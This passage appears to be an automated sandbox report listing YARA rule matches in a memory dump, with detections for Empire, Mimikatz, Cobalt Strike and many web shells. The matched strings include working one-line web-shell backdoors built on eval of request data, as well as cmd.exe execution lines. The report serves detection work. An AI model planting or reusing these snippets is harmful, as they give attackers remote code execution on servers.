- 0x5490:$s3: if ($script:AgentDelay -ne 0){
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen3 | Detects Empire component | Florian Roth | - 0x56af:$s1: if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
- 0x5702:$s2: remote DLL injection
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_InveighRelay_Gen | Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1 | Florian Roth | - 0x587e:$s1: $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
- 0x58e7:$s2: $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_KeePassConfig_Gen | Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1 | Florian Roth | - 0x5a88:$s1: $KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Portscan_Gen | Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1 | Florian Roth | - 0x5c1a:$s1: Test-Port -h $h -p $Port -timeout $Timeout
- 0x5c49:$s2: 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen4 | Detects Empire component | Florian Roth | - 0x6027:$s1: Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
- 0x6089:$s2: # Get a handle to the module specified
- 0x60b4:$s3: $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
- 0x60f3:$s4: $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1 | Florian Roth | - 0x6309:$s1: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle
- 0x6309:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
- 0x637e:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Gen | Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1 | Florian Roth | - 0x65cb:$s1: $Shellcode1 += 0x48
- 0x65e3:$s2: $PEHandle = [IntPtr]::Zero
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen5 | Detects Empire component | Florian Roth | - 0x67b7:$s1: if ($ExeArgs -ne $null -and $ExeArgs -ne '')
- 0x67e8:$s2: $ExeArgs = "ReflectiveExe $ExeArgs"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Impacket_Tools_Generic_1 | Compiled Impacket Tools | Florian Roth | - 0x93a3:$s1: bpywintypes27.dll
- 0x93b9:$s2: hZFtPC
- 0x7036:$s3: impacket
- 0x7187:$s3: impacket
- 0x72d9:$s3: impacket
- 0x735b:$s3: impacket
- 0x7415:$s3: impacket
- 0x754b:$s3: impacket
- 0x75d8:$s3: impacket
- 0x768d:$s3: impacket
- 0x77b6:$s3: impacket
- 0x78fb:$s3: impacket
- 0x797d:$s3: impacket
- 0x7a44:$s3: impacket
- 0x7aca:$s3: impacket
- 0x7b84:$s3: impacket
- 0x7bf9:$s3: impacket
- 0x7cbf:$s3: impacket
- 0x7dfe:$s3: impacket
- 0x7e7e:$s3: impacket
- 0x7f37:$s3: impacket
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_mimikittenz | Detects Mimikittenz - file Invoke-mimikittenz.ps1 | Florian Roth | - 0xee56:$x1: [mimikittenz.MemProcInspector]
- 0xee79:$s1: PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |
- 0xeeed:$s2: IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);
- 0xef70:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
- 0xefad:$s4: [DllImport("kernel32.dll", SetLastError = true)]
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_PowerSploit | Yara detected PowerSploit | Joe Security | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_Mimikatz_1 | Yara detected Mimikatz | Joe Security | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_Codoso_Ghost | Yara detected Codoso Ghost | Joe Security | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_Meterpreter | Yara detected Meterpreter | Joe Security | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire__Users_neo_code_Workspace_Empire_4sigs_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x31e9:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_h4ntu_shell_powered_by_tsoi_ | Web Shell - file h4ntu shell [powered by tsoi | unknown | - 0x1b181:$s0: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b
- 0x1b1d4:$s3: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> ui
- 0x1b227:$s4: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?=
- 0x1b27a:$s5: <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_sql | Web Shell - file sql.php | Florian Roth | - 0x1b388:$s0: $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_
- 0x1b3d8:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x37a21:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_a | Web Shell - file a.php | Florian Roth | - 0x1b4dc:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x57066:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x1b525:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x52ce6:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x570d8:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x1b56f:$s4: <input name="submit_btn" type="submit" value="Execute Command"></p>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_iMHaPFtp_2 | Web Shell - file iMHaPFtp.php | Florian Roth | - 0x1b67e:$s8: if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($
- 0x1b6d2:$s9: return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Jspspyweb | Web Shell - file Jspspyweb.jsp | Florian Roth | - 0x1b7ed:$s0: out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7
- 0x1b840:$s3: "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x1b98c:$s0: die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n
- 0x1b9de:$s1: Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend | Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x1bb3b:$s2: echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo
- 0x1bb8f:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x31bbb:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpshell_2_1_pwhash | Web Shell - file pwhash.php | Florian Roth | - 0x1bcad:$s1: <tt> </tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pi
- 0x1bcf9:$s3: word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>",
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHPRemoteView | Web Shell - file PHPRemoteView.php | Florian Roth | - 0x1be12:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33525:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x1be63:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x1c347:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_12302 | Web Shell - file 12302.jsp | Florian Roth | - 0x1bf71:$s0: </font><%out.print(request.getRealPath(request.getServletPath())); %>
- 0x1bfbb:$s1: <%@page import="java.io.*,java.util.*,java.net.*"%>
- 0x1bff3:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fc72:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232b1:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_guo | Web Shell - file guo.php | Florian Roth | - 0x1c108:$s0: <?php ($www= $_POST['ice'])!
- 0x1c129:$s1: @preg_replace('/ad/e','@'.str_rot13('riny').'($ww
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_redcod | Web Shell - file redcod.php | Florian Roth | - 0x1c223:$s0: H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw
- 0x1c250:$s1: HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_remview_fix | Web Shell - file remview_fix.php | Florian Roth | - 0x1be63:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x1c347:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x1c393:$s5: echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x1c4d6:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x33cf1:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x1c51b:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_sh_server | Web Shell - file server.php | Florian Roth | - 0x1c62d:$s0: eval(getenv('HTTP_CODE'));
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PH_Vayv_PH_Vayv | Web Shell - file PH Vayv.php | Florian Roth | - 0x1c716:$s0: style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in
- 0x1c75a:$s4: <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_ice | Web Shell - file ice.asp | Florian Roth | - 0x1c86e:$s0: <%eval request("ice")%>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cihshell_fix | Web Shell - file cihshell_fix.php | Florian Roth | - 0x1c956:$s7: <tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty
- 0x1c9ab:$s8: if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_shell | Web Shell - file shell.asp | Florian Roth | - 0x1cac2:$s7: <input type="submit" name="Send" value="GO!">
- 0x1caf4:$s8: <TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Private_i3lue | Web Shell - file Private-i3lue.php | Florian Roth | - 0x1cbfc:$s8: case 15: $image .= "\21\0\
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_up | Web Shell - file up.php | Florian Roth | - 0x1ccd7:$s0: copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
- 0x1cd21:$s3: if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
- 0x1cd66:$s8: echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Mysql_interface_v1_0 | Web Shell - file Mysql interface v1.0.php | Florian Roth | - 0x1ce85:$s0: echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_s_u | Web Shell - file s-u.php | Florian Roth | - 0x1cf93:$s6: <a href="?act=do"><font color="red">Go Execute</font></a></b><br /><textarea
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpshell_2_1_config | Web Shell - file config.php | Florian Roth | - 0x1d0b1:$s1: ; (choose good passwords!). Add uses as simple 'username = "password"' lines.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_EFSO_2 | Web Shell - file EFSO_2.asp | Florian Roth | - 0x1d1c8:$s0: %8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_up | Web Shell - file up.jsp | Florian Roth | - 0x1d2d9:$s9: // BUG: Corta el fichero si es mayor de 640Ks
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_NetworkFileManagerPHP | Web Shell - file NetworkFileManagerPHP.php | Florian Roth | - 0x1d3e9:$s9: echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Server_Variables | Web Shell - file Server Variables.asp | Florian Roth | - 0x1d50f:$s7: <% For Each Vars In Request.ServerVariables %>
- 0x1d542:$s9: Variable Name</B></font></p>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_ice_2 | Web Shell - file ice.php | Florian Roth | - 0x1d62c:$s0: <?php ${${eval($_POST[ice])}};?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_mdb | Web Shell - file mdb.asp | Florian Roth | - 0x1d718:$s1: <% execute request("ice")%>a
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_guige | Web Shell - file guige.jsp | Florian Roth | - 0x1d7fc:$s0: if(damapath!=null &&!damapath.equals("")&&content!=null
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpspy2010 | Web Shell - file phpspy2010.php | Florian Roth | - 0x1d900:$s3: eval(gzinflate(base64_decode(
- 0x240f3:$s3: eval(gzinflate(base64_decode(
- 0x24f45:$s3: eval(gzinflate(base64_decode(
- 0x312d2:$s3: eval(gzinflate(base64_decode(
- 0x3268d:$s3: eval(gzinflate(base64_decode(
- 0x3e9ff:$s3: eval(gzinflate(base64_decode(
- 0x40bb1:$s3: eval(gzinflate(base64_decode(
- 0x42319:$s3: eval(gzinflate(base64_decode(
- 0x1d922:$s5: //angel
- 0x1d92e:$s8: $admin['cookiedomain'] = '';
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_ice | Web Shell - file ice.asp | Florian Roth | - 0x1da0d:$s0: D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_drag_system | Web Shell - file system.jsp | Florian Roth | - 0x1db05:$s9: String sql = "SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_DarkBlade1_3_asp_indexx | Web Shell - file indexx.asp | Florian Roth | - 0x1dc2a:$s3: Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpshell3 | Web Shell - file phpshell3.php | Florian Roth | - 0x1dd44:$s2: <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce'];
- 0x1dd92:$s5: <p>Username: <input name="username" type="text" value="<?php echo $userna
- 0x1dde0:$s7: $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_hsxa | Web Shell - file hsxa.jsp | Florian Roth | - 0x1dee2:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x23b25:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_utils | Web Shell - file utils.jsp | Florian Roth | - 0x1dff4:$s0: ResultSet r = c.getMetaData().getTables(null, null, "%", t);
- 0x1e035:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2303a:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x251ee:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_01 | Web Shell - file 01.asp | Florian Roth | - 0x1e141:$s0: <%eval request("pass")%>
- 0x1fdf0:$s0: <%eval request("pass")%>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_404 | Web Shell - file 404.asp | Florian Roth | - 0x1e21c:$s0: lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshell_cnseay02_1 | Web Shell - file webshell-cnseay02-1.php | Florian Roth | - 0x1e31d:$s0: (93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_fbi | Web Shell - file fbi.php | Florian Roth | - 0x1e430:$s7: erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_B374kPHP_B374k | Web Shell - file B374k.php | Florian Roth | - 0x1e54c:$s0: Http://code.google.com/p/b374k-shell
- 0x1e575:$s1: $_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'
- 0x1e5c9:$s3: Jayalah Indonesiaku & Lyke @ 2013
- 0x1e5ef:$s4: B374k Vip In Beautify Just For Self
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cmd_asp_5_1 | Web Shell - file cmd-asp-5.1.asp | Florian Roth | - 0x1e6e1:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
- 0x3655b:$s9: Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_dodo_zip | Web Shell - file zip.php | Florian Roth | - 0x1e7e5:$s0: $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x
- 0x1e837:$s3: $datastr = "\x50\x4b\x03\x04\x0a
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_aZRaiLPhp_v1_0 | Web Shell - file aZRaiLPhp v1.0.php | Florian Roth | - 0x1e94c:$s5: echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($
- 0x1e997:$s7: echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_list | Web Shell - file list.php | Florian Roth | - 0x1eaab:$s1: // list.php = Directory & File Listing
- 0x1ead6:$s2: echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filena
- 0x1eb25:$s9: // by: The Dark Raver
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ironshell | Web Shell - file ironshell.php | Florian Roth | - 0x1ec05:$s4: print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."
- 0x1ec43:$s8: print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&di
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_404 | Web Shell - file 404.php | Florian Roth | - 0x1ed4e:$s0: <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_aspydrv | Web Shell - file aspydrv.asp | Florian Roth | - 0x1ee69:$s3: <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_web | Web Shell - file web.jsp | Florian Roth | - 0x1ef7c:$s0: <%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_mysqlwebsh | Web Shell - file mysqlwebsh.php | Florian Roth | - 0x1f095:$s3: <TR><TD bgcolor="<? echo (!$CONNECT && $action == "chparam")?"#660000":"#
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jspShell | Web Shell - file jspShell.jsp | Florian Roth | - 0x1f1a8:$s0: <input type="checkbox" name="autoUpdate" value="AutoUpdate" on
- 0x1f1eb:$s1: onblur="document.shell.autoUpdate.checked= this.oldValue;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Dx_Dx | Web Shell - file Dx.php | Florian Roth | - 0x1f2e4:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32e5d:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356b0:$s1: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x1f333:$s9: class=linelisting><nobr>POST (php eval)</td><
- 0x3571f:$s9: class=linelisting><nobr>POST (php eval)</td><
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_ntdaddy | Web Shell - file ntdaddy.asp | Florian Roth | - 0x1f42b:$s9: if FP = "RefreshFolder" or
- 0x1f451:$s10: request.form("cmdOption")="DeleteFolder"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_MySQL_Web_Interface_Version_0_8 | Web Shell - file MySQL Web Interface Version 0.8.php | Florian Roth | - 0x1f572:$s2: href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_elmaliseker_2 | Web Shell - file elmaliseker.asp | Florian Roth | - 0x1f691:$s1: <td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetEx
- 0x1f6e1:$s6: <input type=button value=Save onclick="EditorCommand('Save')"> <input type=but
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_RemExp | Web Shell - file RemExp.asp | Florian Roth | - 0x1f7f8:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x4d9e5:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x1f848:$s1: Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_list1 | Web Shell - file list1.jsp | Florian Roth | - 0x1f95f:$s1: case 's':ConnectionDBM(out,encodeChange(request.getParameter("drive
- 0x1f9a7:$s9: return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpkit_1_0_odd | Web Shell - file odd.php | Florian Roth | - 0x1fab2:$s0: include('php://input');
- 0x20a85:$s0: include('php://input');
- 0x1face:$s1: // No eval() calls, no system() calls, nothing normally seen as malicious.
- 0x1fb1d:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x20aa1:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_123 | Web Shell - file 123.jsp | Florian Roth | - 0x1fc26:$s0: <font color="blue">??????????????????:</font><input type="text" size="7
- 0x1bff3:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fc72:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232b1:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fcc0:$s9: <input type="submit" name="btnSubmit" value="Upload">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_1 | Web Shell - file 1.asp | Florian Roth | - 0x1fdb8:$s4: !22222222222222222222222222222222222222222222222222
- 0x1e141:$s8: <%eval request("pass")%>
- 0x1fdf0:$s8: <%eval request("pass")%>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_tool | Web Shell - file tool.asp | Florian Roth | - 0x1fecd:$s0: Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """
- 0x1ff19:$s3: Response.Write "<tr><td><font face='arial' size='2'><b><DIR> <a href='"
- 0x1ff6c:$s9: Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javas
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cmd_win32 | Web Shell - file cmd_win32.jsp | Florian Roth | - 0x20080:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParam
- 0x200cb:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x22d39:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_jshell | Web Shell - file jshell.jsp | Florian Roth | - 0x201c0:$s0: kXpeW["
- 0x201cc:$s4: [7b:g0W@W<
- 0x201db:$s5: b:gHr,g<
- 0x201e8:$s8: RhV0W@W<
- 0x201f5:$s9: S_MR(u7b
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_zehir4 | Web Shell - file zehir4.asp | Florian Roth | - 0x202c6:$s9: Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/
|
